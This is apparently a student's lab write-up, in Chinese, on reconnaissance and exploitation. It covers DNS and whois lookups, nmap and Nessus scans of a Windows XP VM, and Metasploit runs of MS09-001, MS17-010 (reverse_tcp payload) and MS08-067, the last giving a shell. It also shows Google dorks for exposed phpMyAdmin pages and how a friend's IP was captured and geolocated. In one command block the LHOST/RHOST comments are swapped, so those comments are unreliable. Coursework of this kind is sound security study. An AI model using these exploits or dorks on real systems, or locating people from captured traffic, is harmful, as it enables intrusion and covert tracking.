20232307 2024-2025-1 《网络与系统攻防技术》实验五实验报告

news/2025/11/15 18:49:15/文章来源:https://www.cnblogs.com/20232307MY/p/19209466

20232307 2024-2025-1 《网络与系统攻防技术》实验五实验报告

1. 实验内容

本周学习内容:
信息搜集:通过各种方式获取目标主机或网络的信息,属于攻击前的准备阶段
网络踩点:Google Hacking技术、Web信息搜集与挖掘、DNS查询、网络侦查
网络扫描:主机扫描—ping扫描、端口扫描、探查系统类型、漏洞扫描

2. 实验要求

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息。

(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(3)使用nmap开源软件对靶机环境进行扫描,回答问题并给出操作命令。

(4)使用Nessus开源软件对靶机环境进行扫描,回答问题并给出操作命令。

(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。

(6)练习使用Google hack搜集技能完成搜索(至少10种搜索方法)。

3. 实验过程

3.1 选择一个DNS域名:sina.com.cn进行查询,获取如下信息:

(1)DNS注册人及联系方式

使用命令:

whois sina.com.cn

image

域名:sina.com.cn
注册人:北京新浪互联信息服务有限公司
注册人联系邮箱:domainname@staff.sina.com.cn
赞助注册商:北京新网数码信息技术有限公司
注册时间:1998-11-20 00:00:00
到期时间:2029-12-04 09:32:35

(2)该域名对应IP地址

使用如下命令命令获取目标域名sina.com.cn对应的IP地址、域名服务器、注册信息等关键DNS数据。

dig sina.com.cn

image

查询结果:
49.7.37.60
111.13.134.203
123.126.45.205

②使用下面这个命令查询域名系统记录的命令,用于获取sina.com.cn的IP地址、域名服务器等关键DNS信息

nslookup sina.com.cn

image

查询结果:
111.13.134.203
123.126.45.205
49.7.37.60

(3)IP地址注册人及联系方式

①查询111.13.134.203这个地址的注册人和联系方式
whois 111.13.134.203

image
IP 网段:111.0.0.0 - 111.63.255.255,属于中国移动通信集团

image

角色:chinamobile tech,明确为中国移动的技术团队。
地理位置:位于北京西城区金融大街29号。
电话:+86 5268 6688
传真+86 5261 6187
邮箱hostmaster@chinamobile.com
滥用投诉渠道:abuse@chinamobile.com

image

技术联系人信息:
联系人:haijun li
地理位置:位于北京西城区金融大街29号,邮编100032
国家:中国
电话:+86 1052686688
传真:+86 10 52616187
邮箱:hostmaster@chinamobile.com
滥用投诉渠道:abuse@chinamobile.com

②查询123.126.45.205这个地址的注册人和联系方式
whois 123.126.45.205

image

IP 网段:123.112.0.0——123.127.255.255
所属公司:中国联通北京分公司

image

联系人:ChinaUnicom Hostmaster
邮箱:hqs-ipabuse@chinaunicom.cn
地址:北京市西城区金融大街21号,邮编100033,中国
电话:+86-10-66259764
传真:+86-10-66259764

image

联系人:sun ying
地址:北京市西城区复兴门内大街97号,邮编100800,中国
电话:+86-10-66030657
传真:+86-10-66078815
邮箱:hostmast@publicf.bta.net.cn

③查询49.7.37.60这个地址的注册人和联系方式
whois 49.7.37.60

image

IP网段:49.7.0.0 - 49.7.255.255
描述:中国电信集团北京有限公司,地址为北京市东城区朝阳门北大街21号
管理联系人:YZ2206-AP
技术联系人:HH1408-AP

image

联系人:Hongtao Hou
地址:北京市东城区朝阳门北大街21号,中国
电话:+86-10-58503461
邮箱:zhengym.bj@bjtelecom.cn

image

联系人:Yiming Zheng
地址:北京市东城区朝阳门北大街21号,中国
电话:+86-10-58503461
传真:+86-10-58503054
邮箱:13370163461@189.cn

(4)IP地址的具体地理位置
使用UU在线工具查询IP:123.126.45.205的具体地理位置。
image
查询到地理位置时北京,运营商为联通。

(5)跟踪网络路由
使用如下命令跟踪网络路由:

traceroute sina.com.cn

image

由上图所示:追踪到 sina.com.cn的网络路径的最大跳数限制为30,第一跳是本地局域网内的网关设备。后续跳数均显示 * * *,表示这些网络节点未对traceroute的探测数据包做出响应,这种情况可能是中间路由器配置了禁止ICMP响应或者网络链路存在防火墙拦截。

②使用如下命令跟踪网络路由:

tracert sina.com.cn

image

由上图可见,本地网络连接正常,延迟极低;中间多个节点因防火墙、策略配置或网络特性出现 “请求超时”,属于网络追踪中的常见现象,不代表网络故障;最终成功追踪到新浪目标服务器,说明从本地到新浪的网络路径是通的,整体网络连接正常。

3.2 尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置

使用QQ和好友打电话,开启wireshark进行抓包,部分抓包结果如下图所示:

6c9152d26522515a0f5f87bb81505998

其中,我的IP地址是172.16.242.44,对方的IP地址是113.3.58.57

使用UU在线工具和埃文科技-IP问问查询对方IP的地理位置,结果如下图所示:

使用UU在线工具查询地理位置:

fbefc0b20d55c9fbd4b9b09dca99a1b1

结果显示地理位置在黑龙江省绥化市兰西县。

使用埃文科技-IP问问查询对方IP的地理位置:

7453447773baa25416cc68b857c1855b

结果也显示地理位置在黑龙江省绥化市兰西县。
结果与对方的实际地理位置一致,查询结果准确。

3.3 使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

这一步骤中我使用Windows XP虚拟机作为靶机,Kali虚拟机作为攻击机.
Windows XP虚拟机安装教程可参考: 在 VM 虚拟机中安装 Windows XP 操作系统全攻略

如下图所示,查询Windows XP虚拟机的IP地址为:192.168.190.150.

image

(1)靶机IP地址是否活跃
使用如下命令检查靶机IP是否活跃:

nmap -sn 192.168.190.150

-sn表示“No port scan”的缩写,表示仅进行主机存活探测,不扫描目标端口。

image

该结果清晰地确认了192.168.190.150这台虚拟机当前处于在线状态,且网络响应迅速。

(2)靶机开放了哪些TCP和UDP端口
使用下面的命令进行TCP开放端口查询:

nmap -sS 192.168.190.150

-sS全称为SYN Scan,是TCP半开扫描。

image

由上图可知,开放的TCP端口有135、139、445

②使用下面的命令进行UDP开放端口查询:

nmap -sU 192.168.190.150

-sU全称为UDP Scan,专门针对无连接的UDP协议设计。

image

由上图可知:
开放或过滤的端口有:138、445、500、1900、4500
可以确定的开放的UDP端口:123、137

(3)靶机安装了什么操作系统,版本是多少
使用下面的命令查询靶机安装了什么操作系统,版本是多少

nmap -O 192.168.190.150

-O全称为OS detection,是操作系统探测,启用nmap的操作系统识别模块。

image

操作系统探测结果:Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2,即Windows 2000、Windows XP或 Windows Server 2003系列系统。

(4)靶机上安装了哪些服务
使用下面的命令查询靶机上安装了哪些服务

nmap -sV 192.168.190.150

-sV全称为Service Version detection,启用nmap的服务版本识别模块。

image

由上图所示,靶机上安装并开放了以下服务:
Microsoft Windows RPC 表示微软远程过程调用
Microsoft Windows netbios-ssn 表示NetBIOS会话服务
Microsoft Windows XP microsoft-ds 表示Windows XP文件共享服务

3.4 使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

首先在kali虚拟机上安装配置Nessus,教程详见:Kali Linux Nessus详细安装步骤!!!,个人认为该教程较为详细,有一些可能出现的问题教程中也有解决方案。

(1)靶机上开放了哪些端口
Nessus安装完成后在终端输入如下命令启动Nessus

systemctl start nessusd

image

打开虚拟机中的浏览器进入Nessus网页,
新建扫描:

image

选择Host Discovery:
image

填写名称和IP:
image

开始扫描:
image

扫描需要等待一会儿,扫描完成后点击文件打开,即可看到如下图所示:

image

扫描到打开的端口:135,139,445

(2)靶机各个端口上网络服务存在哪些安全漏洞
创建一个新的扫描,选择Advanced Scan高级扫描

image

填写名称和要扫描的IP地址:

image

扫描后结果如下图所示:

b749366eb4a70f32259207d1e134ab4a

点击aMicrosoft Windows (Multiple lssues)查看具体的漏洞:

c0fba0e6f9797939e93072b27ab8ff82

点击SMB (Multiple lssues)查看具体的漏洞:

afb4d98168c1bbdeb25884e34848258b

上图中有关于445端口的漏洞分别是:

  • SMB Signing not required:SMB 签名未强制要求漏洞。远程SMB服务器未要求消息签名,未认证的远程攻击者可利用这一点对SMB服务器实施中间人攻击,从而篡改或窃取SMB通信中的数据。

  • MS09-001: Microsoft Windows SMB远程代码执行漏洞。攻击者可通过发送特制的SMB数据包,触发内存损坏,从而在受影响系统上执行任意代码。

  • MS08-067:Microsoft Windows服务器服务特制RPC请求处理远程代码执行漏洞。攻击者通过发送特制的RPC请求,可在未经身份验证的情况下远程执行代码。

  • MS17-010: Microsoft Windows SMB服务器安全更新(“永恒之蓝” 漏洞)。该漏洞是SMBv1协议的多个远程代码执行漏洞集合,如 CVE-2017-0143、CVE-2017-0147,攻击者通过发送特制的SMB请求,可在目标系统上执行任意代码。

(3)你认为如何攻陷靶机环境,以获得系统访问权
此处我对MS09-001、MS17-010、MS08-067这三个漏洞都进行了利用分析,但是只有利用MS08-067这个漏洞攻陷成功了。
我的靶机系统是Microsoft Windows XP Pack 3(版本2002)
①MS09-001
使用命令:

msfconsole
> search ms09-001
> use auxiliary/dos/windows/smb/ms09_001_write
> setg LHOST 192.168.190.150   #靶机IP
> set RHOST 192.168.190.137    #攻击机IP
> run

image

运行模块后,尝试发送不同参数的畸形数据包,意图使目标主机的SRV.SYS驱动因数据偏移等问题崩溃,达到拒绝服务的攻击效果,但实际上被没有成功,貌似是靶机版本的原因,该漏洞疑似被修复。

②MS17-010
使用下面的命令:

msfconsole
search ms17-010
# 选择 msf 相关的模块
use exploit/windows/smb/ms17_010_psexec
# 设置靶机的IP
set rhosts 192.168.190.150
# 设置攻击使用的 payload
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.190.137
# 进行攻击
exploit

image
image

可见,此次攻击虽然利用了漏洞,但是由于无法构建符合靶机的载荷,最终被没有成功攻陷靶机。

③MS08-067:
使用下面的命令:

search MS08-067 #搜索漏洞载荷
use 35 #针对windows XP SP3 Chinese环境
set RHOST 192.168.190.150
exploit

输入shell,即可获得靶机的命令提示符:

image

由上图所示,攻陷靶机成功!

3.5 通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题

在Microsoft Edge中输入intext:(孟月 OR 20232307)搜索自己的信息

image

如上图所示,可以查到我的博客园中的实验报告和我的Gitee账号。
此外,搜索我的手机号和身份证号码都没有搜索到相关的信息。

在微信“搜一搜”中搜索我的姓名+学校,能看到一篇公众号中出现过我的姓名。

image

3.6 练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

①site: 限制搜索结果只来自某个特定域名下的页面。
使用site:www.besti.edu.cn搜索学校官网下的页面,如下图所示:

image

②intitle: 用于搜索网页标题中包含特定关键词的页面。例如:intitle:"index of" 可以找到包含“index of”这一标题的页面,通常这类页面会暴露网站的目录结构。
如图所示:

image

③filetype:xlsx指定搜索Excel表格文件
filetype:xlsx 报告 site:gov.cn
结果如下图所示:

image

④inurl:筛选URL中包含 “phpmyadmin” 的网页,且限定在.com域名下。phpMyAdmin 是数据库管理工具,该语句可定位公开暴露的数据库管理页面,多用于排查数据库泄露风险。
inurl:phpmyadmin site:com
结果如下图所示:
image

⑤intext:仅在网页正文中检索关键词。intext:"北京电子科技学院"
结果如下图所示:

image

⑥cache:用于调取服务器存储的example.com网站缓存页面。若目标网站暂时无法访问、被删除,或内容已修改,可通过缓存查看其历史内容。
cache:example.com
结果如下图所示:
image

⑦related:可搜索与github.com结构、内容相似的网站,适合挖掘同类代码托管平台,或寻找功能相近的技术类网站。
related:github.com
结果如下图所示:

image

⑧link:能查找所有包含指向blog.csdn.net链接的网页,可用于统计有多少外部网站引用了该网站内容,也能挖掘与该技术博客有关联的平台。
link:blog.csdn.net
结果如下图所示:

image

⑨用..限定数字范围(此处为 2020 - 2025 年),结合filetype:pdf,可精准搜索该时间段内的人工智能发展报告类 PDF 文件,适合搜集特定时段的行业报告。
2020..2025 人工智能 发展报告 filetype:pdf
结果如下图所示:

image

⑩定位存在数据库故障提示的非搜索引擎类网页。
(intext:sql错误 | intext:数据库连接失败) -site:baidu.com
结果如下图所示:

image

4.问题及解决方案

  • 问题1:在使用nmap扫描靶机查看哪个端口开放时,使用命令nmap -sS 192.168.190.150但没有扫描到开放的端口,如下图所示:

image

  • 问题1解决方案:后来检查发现,这是因为靶机的防火墙没有关闭:

image

关闭防火墙后,扫描结果正确。

  • 问题2:在下载Nessus的过程中,出现Nessus has no plugins. Therefore,functionality is limited(Nessus没有插件。因此,功能有限)。
  • 问题2解决方案:去终端重新更新一下插件。先关闭nessus服务,然后更新插件(可以多更新几次),最后重新开启nessus服务。等待一会再去浏览器查看。

5.学习感悟、思考等

本次实验中,我对信息搜集技术进行了实践,分别进行了DNS域名进行查询、IP地理位置反查、nmap对靶机环境扫描、Nessus对靶机环境扫描和Google hack搜索,整体的实验内容非常丰富有趣,感觉与日常生活联系密切。在深化信息搜集技术的同时也进一步认识到了网络时代保护个人信息的重要性。
本次实验整体较为顺利,我认识到理论的学习和动手实验密不可分,只有将理论知识落实才能真正的有所收获。本次实验收获最大的是攻陷靶机这一环节,我逐个尝试利用了MS的3个漏洞,通过查询资料最后成功利用MS08-067漏洞攻陷了主机。
另外在实验过程中出现问题也是正常的情况,要有足够的耐心和细心冷静分析,慢慢解决吧。

参考资料

  • 在 VM 虚拟机中安装 Windows XP 操作系统全攻略
  • Kali Linux Nessus详细安装步骤!!!
  • Exploit利用学习1:MS09-001
  • 永恒之蓝 MS17-010 漏洞利用 攻击手法

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/966449.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

EXECUTE IMMEDIATE语句分析

在 Oracle 的 PL/SQL 环境中,EXECUTE IMMEDIATE 通常需要包裹在 BEGIN...END 块中执行,因为它是 PL/SQL 的语法元素,不能直接在 SQL 命令行中单独执行(除非使用特定工具的简化模式)。 具体说明:在 PL/SQL 程序中…

产品更新与重构策略:创新与稳定的平衡之道 - 详解

产品更新与重构策略:创新与稳定的平衡之道 - 详解2025-11-15 18:47 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; displ…

MySQL MVCC实现原理

一、概述 1.1 MVCC的定义与价值 MVCC(Multi-Version Concurrency Control)是一种非锁定式并发控制技术,其核心目标是解决读写操作的相互阻塞问题。传统锁机制中,读操作加共享锁、写操作加排他锁,导致读写互斥;而…

算法第三次作业

算法第三次作业 1、按照动态规划法的求解步骤分析作业题目“数字三角形”: 1.1 根据最优子结构性质,列出递归方程式,说明方程式的定义、边界条件 a.递归方程式:c[j]=a[i][j]+max(c[j],c[j+1]) b.方程式的定义:数字…

完整教程:《简易制作 Linux Shell:详细分析原理、设计与实践》

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

计算机网络5 - 指南

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

2025年境外商务出差保险哪里有卖:TOP10平台专业解析

2025年境外商务出差保险哪里有卖:TOP10平台专业解析在当今全球化的商业环境中,境外商务出差已成为众多企业和商务人士的常态。然而,对于有境外商务出差需求的人来说,面临着诸多难题。“选品难(产品繁杂无从下手)…

2025年开除申诉靠谱机构推荐:专业学术申诉机构评测指南!

2025年开除申诉靠谱机构推荐:专业学术申诉机构评测指南!留学途中遭遇学术紧急情况?面临开除、停学或学术不端听证会,一家靠谱的申诉支持机构至关重要。本文基于教育部涉外监管认证信息、机构服务响应速度、申诉成功…

Day39(9)F:\硕士阶段\Java\课程代码\后端\web-ai-code\web-ai-project01\jdbc-demo+springboot-web-quickstart

DQL条件查询-- =================== DQL: 条件查询 ====================== -- 1. 查询 姓名 为 柴进 的员工 select * from emp where name = 柴进;-- 2. 查询 薪资小于等于5000 的员工信息 select * from emp where…

# Android Compose 实现 左滑删除

Android Compose 实现 左滑删除Android Compose 实现 左滑删除 直接看源码 private enum class CardState {Collapsed /* 收缩 */, Expanded /* 展开的 */ // 哈哈哈,还能学点英文 (: } @Composable private fun Pers…

win10pro sn

win10pro snVK7JG-NPHTM-C97JM-9MPGT-3V66T

完整教程:PMBT2222A,215 开关晶体管功率二极管 NXP安世半导体 音频放大电路 LED驱动 应用

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

用递归的方式输出各位数字

include <stdio.h> include <stdlib.h> void f(int n){ if(n<10){ printf("%d ",n); return; }//输出到最后一位 else{int r=0;int x=n;int k=0;//n是k位数while(x!=0){r=x%10;x=x/10;k++;}i…

WebServer类 - 指南

WebServer类 - 指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "C…

EFCore中巧妙利用ToQueryString()实现批插(不借助第三方包)

dotnet10发布了,ef10也快发布了,但是还是只有批量更新(ExecuteUpdateAsync)和批量删除(ExecuteDeleteAsync)功能,没有批量插入。 今天给个办法,在不引用第三方库的情况下,巧妙利用ToQueryString()实现批插。 …

2025 年 11 月门窗十大品牌综合实力权威推荐榜单,产能、专利、环保三维数据透视

引言 2025 年 10 月门窗十大品牌综合实力权威推荐榜单由中国建筑金属结构协会、全国工商联家具装饰业商会联合发布。本次榜单突破传统单一性能评选模式,以《铝合金门窗》(GB/T 8478-2008)为技术底版,创新性构建 “…

20232426 2025-2026-1 《网络与系统攻防技术》实验五实验报告

20232426 2025-2026-1 《网络与系统攻防技术》实验五实验报告 一、实验目标选择指定域名,用要求工具查询DNS、IP相关信息及地理位置。 获取某平台好友IP并查询其具体地理位置。 用nmap扫描靶机,确认其活跃度、端口、…

AzuraCast:自托管一体化网络电台管理套件

AzuraCast是一个功能强大的自托管网络电台管理套件,提供完整的电台解决方案,包括流媒体广播、节目编排、用户管理和API接口,支持多种广播格式和协议,轻松搭建专业级网络电台。AzuraCast:自托管一体化网络电台管理…

2025年11月安徽省有实力的旧房翻新企业综合推荐排行榜

摘要 随着国内城市化进程加速和居民生活品质提升,2025年旧房翻新行业迎来爆发式增长,安徽省特别是合肥地区的旧房翻新需求显著上升。本文基于行业数据、用户口碑、技术实力等多维度评估,为您推荐2025年11月安徽省最…

【前缀和+差分+二分】LeetCode 2528. 最大化城市的最小电量

View Post【前缀和+差分+二分】LeetCode 2528. 最大化城市的最小电量题目 https://leetcode.cn/problems/maximize-the-minimum-powered-city/description/ 题解 以stations = [1,2,4,5,0], r = 1, k = 2为测试用例进行…